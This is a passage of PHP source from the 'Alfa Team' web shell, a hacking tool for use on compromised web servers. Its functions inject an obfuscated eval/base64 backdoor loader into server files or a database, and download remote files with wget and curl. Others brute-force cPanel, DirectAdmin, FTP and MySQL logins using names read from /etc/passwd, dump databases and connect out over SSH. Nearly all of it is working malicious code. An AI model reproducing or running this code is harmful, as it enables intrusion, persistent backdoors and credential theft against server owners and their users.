echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");

}

if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))

echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';

else

echo '</ul></div>';}else{

@error_reporting(E_ALL ^ E_NOTICE);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('magic_quotes_runtime', 0);

@set_time_limit(0);

}}

function alfalogout(){

unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);

echo("<center><font color='red'>Logout...</font></center>");

}

function showAnimation($name){

return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';

}

function __showicon($r){

$s['btn']='http://solevisible.com/images/btn.png';

$s['alfamini']='http://solevisible.com/images/alfamini.png';

$s['loader']='http://solevisible.com/images/loader.png';

//return 'data:image/png;base64,'.__get_resource($s[$r]);

return $s[$r];

}

function alfainbackdoor(){

alfahead();

echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File |</a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';

$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';

$success= '<font color="green">Success...!';

$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";

$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";

$cwd = 'Example: /home/alfa/public_html/index.php';

if($_POST['alfa1']=='file'){

echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");

if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){

$method = $_POST['alfa2'];

$file = $_POST['alfa3'];

$shell = $_POST['alfa4'];

$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));

if($key=='')$key='alfa';

if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}

$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';

if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}

if($_POST['alfa1']=='db'){

echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),

'td6' =>

array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')

);

create_table($table);

echo("<p>{$select}</p>");

echo($textarea);

echo("<p><input type='submit' value=' '></p></form></p></center>");

if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){

$dbhost = $_POST['alfa2'];

$dbuser = $_POST['alfa3'];

$dbpw = $_POST['alfa4'];

$dbname = $_POST['alfa5'];

$file = $_POST['alfa6'];

$method = $_POST['alfa7'];

$shell = $_POST['alfa8'];

$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));

if($key=='')$key='alfa';

if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}

if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){

$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';

if(@is_file($file)&&@is_writable($file)){

@mysqli_query($conn,'DROP TABLE `alfa_bc`');

@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');

@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');

@file_put_contents($file,$code."\n".@file_get_contents($file));

__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}

echo('</div>');

alfafooter();

}

function alfawhois(){

echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");

if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){

$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);

$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;

$data = @file_get_contents($target);

if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}

$target = @json_decode($data,true);

echo __pre();

if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}

echo("</div>");

}

function alfaremotedl(){

alfahead();

echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>

<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">

<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>

<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>

</form></p></center>");

if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){

echo __pre();

$url = $_POST['alfa1'];

$path = $_POST['alfa2'];

echo('<center>');

if(__download($url,$path)){

echo('<font color="green">Success...!</font>');

}else{

echo('<font color="red">Error...!</font>');

}

echo('</center>');

}

echo("</div>");

alfafooter();

}

function __download($url,$path=false){

if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;

$saveas = basename(rawurldecode($url));

if($path){$saveas=$path.$saveas;}

if($content = __read_file($url)){

if(@is_file($saveas))@unlink($saveas);

if(__write_file($saveas, $content)){return true;}}

$buff = alfaEx("wget ".$url." -O ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("curl ".$url." -o ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("lwp-download ".$url." ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("lynx -source ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("GET ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("links -source ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("fetch -o ".$saveas." -p ".$url);

if(@is_file($saveas)) return true;

return false;

}

function clean_string($string){

if(function_exists("iconv")){

$s = trim($string);

$s = iconv("UTF-8", "UTF-8//IGNORE", $s);

}

return $s;

}

function __read_file($file, $boom = true){

$content = false;

if($fh = @fopen($file, "rb")){

$content = "";

while(!feof($fh)){

$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);

}

}

if(empty($content)||!$content){

$content = alfaEx("cat '".addslashes($file)."'");

}

return $content;

}

function alfaSettings(){

alfahead();

AlfaNum(6,7,8,9,10);

echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';

if($_POST["alfa8"] == "main"){

echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';

$lg_array = array('0'=>'No','1'=>'Yes');

$penc_array = array('false'=>'No','true'=>'Yes');

$protect_html = "";

$icon_html = "";

$postEnc_html = "";

$login_html = "";

foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';

foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';

foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';

$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");

foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';

echo '';

echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';

if($_POST['alfa5']=='>>'){

echo __pre();

if(!empty($_POST['alfa3'])){

$protect = $_POST['alfa1'];

$lgpage = $_POST['alfa2'];

$username = $_POST['alfa3'];

$password = md5($_POST['alfa4']);

$icon = $_POST['alfa6'];

$post_encrypt = $_POST['alfa7'];

@chdir($GLOBALS['home_cwd']);

$basename = @basename($_SERVER['PHP_SELF']);

$data = @file_get_contents($basename);

$find_user = '/\'user\'(.*?),/i';

$find_pw = '/\'pass\'(.*?),/i';

$find_lg = '/\'login_page\'(.*?),/i';

$find_p = '/\'safemode\'(.*?),/i';

$icons = '/\'show_icons\'(.*?),/i';

$postEnc = '/\'post_encryption\'(.*?),/i';

if(!empty($username)&&preg_match($find_user,$data,$e)){

$new = '\'user\' => \''.$username.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){

$new = '\'pass\' => \''.$password.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){

$new = '\'login_page\' => \''.$lgpage.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($find_p)&&preg_match($find_p,$data,$e)){

$new = '\'safemode\' => \''.$protect.'\',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($icons,$data,$e)){

$new = '\'show_icons\' => \''.$icon.'\',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($postEnc,$data,$e)){

$new = '\'post_encryption\' => '.$post_encrypt.',';

$data = str_replace($e[0],$new,$data);

}

if(@file_put_contents($basename,$data)){

echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';

}else{

__alert("<span style='color:red;'>File has no edit access...!</span>");

}

}else{

__alert("<span style='color:red;'>UserName is Empty !</span>");

}

}

}elseif($_POST["alfa8"] == "color"){

echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');

echo '<table border="1"><tbody>';

$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';

$x = 1;

foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){

$multi = "";

if(is_array($value)){

if(isset($value["multi_selector"])){

$multi = __ZW5jb2Rlcg(json_encode($value));

}

}

$value = alfa_getColor($key);

$help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));

echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);

}

echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';

echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';

if($_POST['alfa7']=='export'){

echo __pre();

$colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();

$glob_colors = $GLOBALS["__ALFA_COLOR__"];

$array = array();

foreach($glob_colors as $k => $v){

if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){

$v = trim($colors[$k]);

}else{

$v = trim(is_array($v)?$v["key_color"]:$v);

}

$array[$k] = $v;

}

$file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";

$config = json_encode($array, JSON_PRETTY_PRINT);

if(!@file_put_contents($file, $config)){

echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');

}else{

echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');

}

}

if($_POST['alfa2']=='>>'){

echo __pre();

$colors = json_decode($_POST["alfa1"],true);

$array = "";

$is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;

$glob_colors = $GLOBALS["__ALFA_COLOR__"];

foreach($glob_colors as $k => $v){

if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){

$v = trim($colors[$k]);

}else{

$v = trim(is_array($v)?$v["key_color"]:$v);

}

$array .= '"'.trim($k).'" => "'.$v.'",';

}

@chdir($GLOBALS['home_cwd']);

$basename = @basename($_SERVER['PHP_SELF']);

$data = @file_get_contents($basename);

$color = '/\'color\'(.*?)\),/s';

if(preg_match($color,$data,$e)){

$new = "'color' => array(".$array."),";

$data = str_replace($e[0],$new,$data);

if(@file_put_contents($basename, $data)){

echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");

}else{echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");

}

}else{

echo("<center><p><h3>[-] Error...!</h3></p></center>");

}

}

}

echo('</div>');

alfafooter();

}

function alfaplus(){

alfahead();

echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';

if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){

try{

$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');

$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";

$news = new AlfaCURL();

if($news->Send($s1)){

$xml = $news->Send($s1);

}else{

$xml = false;

}

if($xml){

if(@simplexml_load_string($xml)){

$doc = new DOMDocument;

$doc->loadXML($xml);

$data = $doc->getElementsByTagName('data')->item(0);

$items = $data->getElementsByTagName('item');

foreach($items as $item){

$title = $item->getElementsByTagName('title')->item(0)->nodeValue;

$description = $item->getElementsByTagName('description')->item(0)->nodeValue;

$link = $item->getElementsByTagName('link')->item(0)->nodeValue;

$pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;

echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");

}

}else{

echo($msg);

}

}else{

echo($msg);

}

}catch(Exception $e){

echo $e->getMessage();

}}elseif($_POST['alfa1']=='about'){

echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>

<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>

<font color='#00A220'>Shell Coded By SUPERBONE X TEAM (ALFA TEaM)</font><br>

<font color='#00A220'>Contact : solevisible@gmail.com</font><br>

<font color='#00A220'>Telegram Channel: @solevisible</font><br>

<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>

<font color='#FFFFFF'>Skype : sole.sad</font><br>

<font color='#FF0000'>Persian Gulf For Ever</font><br>

<font color='#FF0000'>Iranian Hackers :)</font><br>

<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>

</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";

}

echo('</div>');

alfafooter();

}

function alfaDumper(){

alfahead();

echo('<div class="header">');

AlfaNum(8,9,10);

echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')

);

create_table($table);

echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";

$username = ($_POST['alfa3']);

$password = ($_POST['alfa4']);

$dbname = ($_POST['alfa5']);

$dfile = ($_POST['alfa6']);

$host = ($_POST['alfa7']);

if(!empty($dbname)){

echo __pre();

$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";

if(@mysqli_connect($host,$username,$password,$dbname)){

if(strlen(alfaEx("mysqldump"))>0){

alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");

echo($msg);

}else{

__alert("Error...!");

}

}else{

echo('<center>mysqli_connect : Error!</center>');

}

}

echo('</div>');

alfafooter();

}

function Alfa_DirectAdmin_Cracker($info){

if(!$info['mysql'])

$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';

else $url = $info['protocol'].$info['target'].'/phpmyadmin';

$curl = curl_init();

curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);

curl_setopt($curl, CURLOPT_HEADER,0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL,$url);

curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);

if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);

$result = curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}

elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){

echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_CP_Cracker($info){

$url = $info['protocol'].$info['target'].':'.$info['port'];

$curl = curl_init();

curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);

curl_setopt($curl, CURLOPT_HEADER,0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));

curl_setopt($curl, CURLOPT_URL, $url);

$result = curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}

elseif(preg_match('/filemanager/i',$result)){

echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_FTP_Cracker($info){

$url = $info['protocol'].$info['target'];

$curl = curl_init();

curl_setopt($curl, CURLOPT_URL, $url);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");

$result = curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}

elseif(preg_match('/(\d+):(\d+)/i',$result)){

echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_Mysql_Cracker($info){

if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){

CrackerResualt($info);

echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';

}

}

function Alfa_FTPC($info){

if($con=@ftp_connect($info['target'],$info['port'])){

if($con){

$login=@ftp_login($con,$info['username'],$info['password']);

if($login){CrackerResualt($info);}}}

@ftp_close($con);

}

function CrackerResualt($info){

$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;

$c = @fopen($info['fcrack'],'a+');

@fwrite($c, $res);

@fclose($c);

}

function Alfa_Call_Function_Cracker($method,$info){

switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}

}

function alfaCrackers(){

alfahead();

AlfaNum(9,10);

echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';

foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');

echo '</select> Protocol: <select id="protocol" name="protocol">';

foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');

echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">

Port: <input id="port" type="text" name="port" value="2083">

<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>

<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>

&nbsp <textarea placeholder="Passwords" rows="20"cols="25" name="passwords"></textarea><br><br>

Save Result Into File <input type="text" name="fcrack" value="cracked.txt">

<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';

$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);

$port = $_POST['alfa2'];

$usernames= $_POST['alfa3'];

$passwords = $_POST['alfa4'];

$fcrack = $_POST['alfa5'];

$cracking = $_POST['alfa6'];$protocol = $_POST['alfa7'];

$loginpanel = $_POST['alfa8'];

$p = $loginpanel == 'phpmyadmin' ? $p = true : false;

if($cracking=='start'){

echo __pre();

$exuser = explode("\n",$usernames);

$expw = explode("\n",$passwords);

foreach($exuser as $user){

foreach($expw as $pw){

$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);

Alfa_Call_Function_Cracker($loginpanel,$array);

}

}

echo '<br><font color="red">Attack Finished...</font>';

}

echo '</div>';

alfafooter();

}

function alfassh2(){

if(function_exists('ssh2_connect')){

$_SESSION['connected']= false;

$ssh_ip = $_POST['alfa1'];

$ssh_login = $_POST['alfa2'];

$ssh_pass = $_POST['alfa3'];

$ssh_port = $_POST['alfa4'];

$ssh_command = $_POST['alfa5'];

if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))

{

if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))

{

$_SESSION['connected']= true;

}

}

if($_SESSION['connected']!== true){

alfahead();

echo "<div class=header>";

echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";

alfafooter();

}

if($_SESSION['connected']==true){

alfahead();

echo "<div class=header>";

